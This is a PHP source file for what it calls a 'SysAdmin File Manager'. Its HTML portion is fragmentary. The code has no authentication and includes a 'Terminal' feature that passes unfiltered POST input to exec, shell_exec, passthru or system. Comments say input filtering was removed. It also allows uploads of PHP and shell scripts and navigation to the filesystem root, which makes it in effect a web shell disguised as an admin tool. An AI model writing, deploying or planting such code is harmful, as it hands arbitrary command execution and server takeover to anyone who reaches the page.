"SysAdmin File Manager", 'session_duration' => 3600 * 24 * 7, 'debug_mode' => false, 'root_dir' => null, // Set specific path if needed, e.g., __DIR__ 'allowed_extensions' => array('txt', 'pdf', 'doc', 'docx', 'xls', 'xlsx', 'jpg', 'jpeg', 'png', 'gif', 'php', 'html', 'zip', 'json', 'xml', 'css', 'js', 'sh', 'sql'), 'max_upload_size' => 100 * 1024 * 1024 // 100MB ); // --- Initialization --- @ob_start(); @set_time_limit(0); @ini_set('html_errors', '0'); define('DS', DIRECTORY_SEPARATOR); // Session Setup if (session_status() === PHP_SESSION_NONE) { session_set_cookie_params([ 'lifetime' => $config['session_duration'], 'path' => '/', 'domain' => '', 'secure' => isset($_SERVER['HTTPS']), 'httponly' => true, 'samesite' => 'Strict' ]); session_start(); } // Security Token if (empty($_SESSION['security_token'])) { $_SESSION['security_token'] = bin2hex(random_bytes(32)); } $security_token = $_SESSION['security_token']; // --- Helper Functions --- function clean_input($data) { if (is_array($data)) return array_map('clean_input', $data); return htmlspecialchars(stripslashes($data), ENT_QUOTES, 'UTF-8'); } $_GET = clean_input($_GET); $_POST = clean_input($_POST); // We don't clean REQUEST superglobal directly to avoid issues, use specific GET/POST // Error Reporting if ($config['debug_mode']) { error_reporting(E_ALL); ini_set('display_errors', '1'); } else { error_reporting(0); ini_set('display_errors', '0'); } function verify_token($token) { return isset($_SESSION['security_token']) && hash_equals($_SESSION['security_token'], $token); } /** * Resolves the path securely. */ function resolve_path($path) { $real = realpath($path); if ($real === false) return false; global $config; if ($config['root_dir'] !== null) { $root_real = realpath($config['root_dir']); // Ensure the resolved path is inside the root if ($root_real && strpos($real, $root_real) !== 0) return false; } return $real; } function format_size($size) { if ($size <= 0) return '0 B'; $units = array('B', 'KB', 'MB', 'GB', 'TB'); $base = log($size, 1024); return round(pow(1024, $base - floor($base)), 2) . ' ' . $units[floor($base)]; } function get_perms($file) { if (!file_exists($file)) return '---------'; $perms = fileperms($file); $info = ''; if (($perms & 0xC000) == 0xC000) $info = 's'; elseif (($perms & 0xA000) == 0xA000) $info = 'l'; elseif (($perms & 0x8000) == 0x8000) $info = '-'; elseif (($perms & 0x6000) == 0x6000) $info = 'b'; elseif (($perms & 0x4000) == 0x4000) $info = 'd'; else $info = 'u'; $info .= (($perms & 00400) ? 'r' : '-'); $info .= (($perms & 00200) ? 'w' : '-'); $info .= (($perms & 00100) ? 'x' : '-'); $info .= (($perms & 00040) ? 'r' : '-'); $info .= (($perms & 00020) ? 'w' : '-'); $info .= (($perms & 00010) ? 'x' : '-'); $info .= (($perms & 00004) ? 'r' : '-'); $info .= (($perms & 00002) ? 'w' : '-'); $info .= (($perms & 00001) ? 'x' : '-'); return $info; } function delete_directory($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir)) return @unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!delete_directory($dir . DS . $item)) return false; } return @rmdir($dir); } // FIXED: Command Execution // Removed the restrictive regex that blocked '&', '.', etc. // escapeshellarg is used on the directory path for safety. function execute_command($command) { $output = ''; // Check functions availability if (function_exists('exec')) { @exec($command . ' 2>&1', $output, $ret_val); return implode("\n", $output); } if (function_exists('shell_exec')) { return @shell_exec($command . ' 2>&1'); } if (function_exists('passthru')) { ob_start(); @passthru($command . ' 2>&1'); return ob_get_clean(); } if (function_exists('system')) { ob_start(); @system($command . ' 2>&1'); return ob_get_clean(); } return "Error: No command execution functions (exec, shell_exec, etc.) are available."; } // --- Core Logic --- $self = basename($_SERVER['PHP_SELF']); $message = ''; $message_type = 'info'; // Initialize Directory Paths $script_dir = __DIR__; // Base Start: Use Script Directory $base_start = $script_dir; if ($config['root_dir']) $base_start = $config['root_dir']; // Current Dir Logic $current_dir = $base_start; if (isset($_SESSION['current_dir'])) { $session_dir = $_SESSION['current_dir']; // Validate session dir is still valid if (is_dir($session_dir)) { $current_dir = $session_dir; } } // --- Handle POST (Actions) --- if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (!verify_token($_POST['security_token'] ?? '')) { $message = "Invalid Security Token."; $message_type = 'error'; } else { // UPLOAD if (isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] === UPLOAD_ERR_OK) { $file_info = pathinfo($_FILES['upload_file']['name']); $ext = strtolower($file_info['extension'] ?? ''); // Check extension if (in_array($ext, $config['allowed_extensions']) || empty($config['allowed_extensions'])) { $dest = $current_dir . DS . basename($_FILES['upload_file']['name']); // FIX: Check if directory is writable, try to chmod if not if (!is_writable($current_dir)) { @chmod($current_dir, 0755); // Attempt to fix permission } if (is_writable($current_dir)) { if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $dest)) { $message = "File uploaded successfully."; $message_type = 'success'; // Optional: Change file perms @chmod($dest, 0644); } else { $message = "Failed to move file. PHP cannot write to the destination."; $message_type = 'error'; } } else { $message = "Directory is not writable (Permission Denied). Check folder ownership."; $message_type = 'error'; } } else { $message = "Extension '$ext' not allowed."; $message_type = 'error'; } } // CREATE DIR if (isset($_POST['mkdir']) && !empty($_POST['mkdir'])) { $dir_name = basename($_POST['mkdir']); $new_path = $current_dir . DS . $dir_name; if (!file_exists($new_path)) { if (!is_writable($current_dir)) @chmod($current_dir, 0755); if (@mkdir($new_path, 0755)) { $message = "Folder '$dir_name' created."; $message_type = 'success'; } else { $message = "Failed to create folder (Permission denied)."; $message_type = 'error'; } } else { $message = "Folder already exists."; $message_type = 'error'; } } // RENAME if (isset($_POST['rename_from']) && isset($_POST['rename_to'])) { $old_path = $current_dir . DS . basename($_POST['rename_from']); $new_path = $current_dir . DS . basename($_POST['rename_to']); if (file_exists($old_path)) { if (@rename($old_path, $new_path)) { $message = "Renamed successfully."; $message_type = 'success'; } else { $message = "Rename failed (Permission denied)."; $message_type = 'error'; } } else { $message = "Source not found."; $message_type = 'error'; } } // TERMINAL if (isset($_POST['cmd']) && !empty($_POST['cmd'])) { // We cd into the directory first, then execute the user command. // This allows wget to work properly. $cmd = "cd " . escapeshellarg($current_dir) . " && " . $_POST['cmd']; $cmd_output = execute_command($cmd); } } } // --- Handle GET (Navigation & Delete) --- if ($_SERVER['REQUEST_METHOD'] === 'GET') { // Navigation if (isset($_GET['cd'])) { $requested = $_GET['cd']; // Handle 'Root' or empty if ($requested === '/' || empty($requested)) { $current_dir = $config['root_dir'] ?? DS; } else { $resolved = resolve_path($requested); if ($resolved && is_dir($resolved)) { $current_dir = $resolved; } else { $message = "Cannot access directory."; $message_type = 'error'; } } $_SESSION['current_dir'] = $current_dir; } // Ensure Current Dir is valid after operations if (!is_dir($current_dir)) { $current_dir = $base_start; $_SESSION['current_dir'] = $current_dir; } // DELETE if (isset($_GET['delete']) && isset($_GET['confirm_token'])) { if (verify_token($_GET['confirm_token'])) { $target_name = basename($_GET['delete']); $target_path = $current_dir . DS . $target_name; // Ensure target is inside current dir for safety if (strpos(realpath($target_path) ?: $target_path, realpath($current_dir)) === 0 && file_exists($target_path)) { if (is_dir($target_path)) { if (delete_directory($target_path)) { $message = "Directory deleted."; $message_type = 'success'; } else { $message = "Failed to delete directory (Check permissions)."; $message_type = 'error'; } } else { if (@unlink($target_path)) { $message = "File deleted."; $message_type = 'success'; } else { $message = "Failed to delete file (Permission denied)."; $message_type = 'error'; } } } else { $message = "Invalid deletion path."; $message_type = 'error'; } } else { $message = "Invalid security token."; $message_type = 'error'; } } // VIEW FILE if (isset($_GET['view'])) { $file = basename($_GET['view']); $path = $current_dir . DS . $file; if (is_file($path) && is_readable($path)) { $file_content = file_get_contents($path); // Simple binary check if (preg_match('~[^\x20-\x7E\t\r\n]~', $file_content) && !in_array(strtolower(pathinfo($path, PATHINFO_EXTENSION)), ['png', 'jpg', 'gif', 'pdf'])) { $view_content = "Binary content hidden for safety."; } else { $view_content = "
" . htmlspecialchars($file_content) . "
"; } } else { $view_content = "File not readable."; } } } // --- Breadcrumb Generation --- function create_breadcrumbs($path) { global $self, $security_token; $parts = explode(DS, $path); $build = ''; $html = ''; return $html; } $parent_dir = dirname($current_dir); $has_parent = ($parent_dir !== $current_dir); ?> <?php echo $config['app_name']; ?>

@
PHP
📂 Files 📤 Upload 💻 Terminal 🏠 Script Dir ⬆ Up

Upload to:

Max: MB | Allowed:
$
Working directory:

Viewing:

Close Viewer
"; } else { $dirs = []; $items = []; foreach ($files as $f) { if ($f === '.' || $f === '..') continue; $path = $current_dir . DS . $f; if (is_dir($path)) $dirs[$f] = $path; else $items[$f] = $path; } ksort($dirs); ksort($items); $all_files = $dirs + $items; foreach ($all_files as $name => $path) { $is_dir = is_dir($path); $icon = $is_dir ? '📁' : '📄'; $size = $is_dir ? '-' : format_size(filesize($path)); $perms = get_perms($path); $time = date('Y-m-d H:i', filemtime($path)); $link_url = $is_dir ? '?cd='.urlencode($path).'&security_token='.$security_token : '?view='.urlencode($name); $safe_name = htmlspecialchars($name); $safe_name_js = addslashes($name); ?> "; } } ?>
Name Size Perms Modified Actions
Unable to list directory. Permission denied?
View Rename Delete
Folder is empty